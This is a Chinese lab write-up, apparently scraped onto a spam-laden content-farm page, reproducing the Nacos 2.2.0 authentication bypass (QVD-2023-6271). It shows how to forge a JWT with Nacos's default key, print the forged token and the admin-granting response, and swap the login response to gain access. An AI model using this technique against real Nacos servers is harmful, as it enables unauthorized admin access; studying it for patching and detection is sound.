当前位置: 首页 > news >正文

东莞网站推广费用百度一下官方入口

东莞网站推广费用,百度一下官方入口,简单免费的制图软件,网站菜单怎么做Nacos身份绕过漏洞复现(QVD-2023-6271) 环境配置 该漏洞主要用了win10_JAVA的环境,参考网上已有的复现文章,使用jdk-11.0.2_windows-x64_bin.exe 由于2.2.0之后的nacos已将本漏洞修复,所以本次复现使用2.2.0的包 下…

Nacos身份绕过漏洞复现(QVD-2023-6271

环境配置

该漏洞主要用了win10_JAVA的环境,参考网上已有的复现文章,使用jdk-11.0.2_windows-x64_bin.exe

由于2.2.0之后的nacos已将本漏洞修复,所以本次复现使用2.2.0的包

下载完毕解压至虚拟机后,执行

startup.cmd -m standalone

启动本地nacos
在这里插入图片描述

在这里插入图片描述

有意思的点

度盘没会员,又弄不明白电驴,所以关于下载win10 iso找了几位师傅都无果,后续查找解决方法发现在windows官网中,F12+ctrl shift M,将UA设为ipone系设备再刷新,可直接进行下载。

在这里插入图片描述

复现过程
获取相应cookie

本漏洞须先准备一大于目前系统时间的时间戳,本机目前时间为2023/11/25,所以直接构造2023/11/26即可(1700982711)

在这里插入图片描述

使用nacos默认key进行jwt伪造

具体位置如下图:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

直接把时间戳写进去即可:

在这里插入图片描述

得到值:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwMDk4MjcxMX0.zcBeSKVO7InaQlAgnpJkENEzL_1xFSauSdP-_8HihR0

构造请求包

在这里插入图片描述

这里报了个500的错,搜了一些资料,问了几位师傅都寄了

后来问了项目组的师傅,说是类型的问题,添加

Content-Type: application/x-www-form-urlencoded

即可

在这里插入图片描述

得到Token消息:

HTTP/1.1 200
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Set-Cookie: JSESSIONID=96ABFAC9B2CE500678E99664225AE34F; Path=/nacos; HttpOnly
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwMDk4MjcxMX0.zcBeSKVO7InaQlAgnpJkENEzL_1xFSauSdP-_8HihR0
Content-Type: application/json
Date: Sat, 25 Nov 2023 07:35:21 GMT
Content-Length: 197{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwMDk4MjcxMX0.zcBeSKVO7InaQlAgnpJkENEzL_1xFSauSdP-_8HihR0","tokenTtl":18000,"globalAdmin":true,"username":"nacos"}
登录

使用hongzh0/hongzh0登录必然是登录不上的

在这里插入图片描述

劫持响应,将刚才的返回包替换掉后即可成功登录

在这里插入图片描述

http://www.sczhlp.com/news/39848/

相关文章:

  • 做导航网站有发展吗杭州seo网络公司
  • 高端定制网站开发网站模板设计东营百度推广公司
  • 当铺网站建设方案网站建设工作总结
  • 对于零编程基础的人,入门 Java 开发应先学习语法还是直接上手项目实践?
  • 社区门户网站模板seo外包推广
  • 出站链接对网站有什么影响aso优化费用
  • 广州专业网站建设报价seo关键词搜索优化
  • app界面设计制作步骤衡阳seo快速排名
  • 个人网站备案 内容优化关键词有哪些方法
  • 网站做cdn服务流量数据指数
  • 影视传媒公司优质的seo快速排名优化
  • 国内有哪些做卡通素材的网站by72777最新域名查询
  • 安徽优化网站找回原来的百度
  • WHUCTF2025暑假新生赛(一)
  • 衢州网站建设有限公司中国知名网站排行榜
  • word怎么做网站链接上海十大公关公司排名
  • 张家港做网站网络推广软件哪个好
  • 网站建设授权书电商平台推广方式有哪些
  • WordPress会话有效时间seo快速排名利器
  • [buuctf]mrctf2020_shellcode 1
  • NOSQL
  • 题解:P1451 求细胞数量
  • 定制高端网站建设报价搜索引擎推广成功的案例
  • 百度收录网站电话开发制作app软件
  • 手机网站模板更换方法网上推销产品的软件
  • 烟台汽车租赁网站建设设计一个公司网站多少钱
  • 没有网站可以做淘宝客吗整站seo技术
  • 深圳企业网站公司seo和sem的区别是什么
  • 长春电商网站建设哪家专业百度指数怎么分析
  • 网站开发语言哪种简单2023疫情第三波爆发时间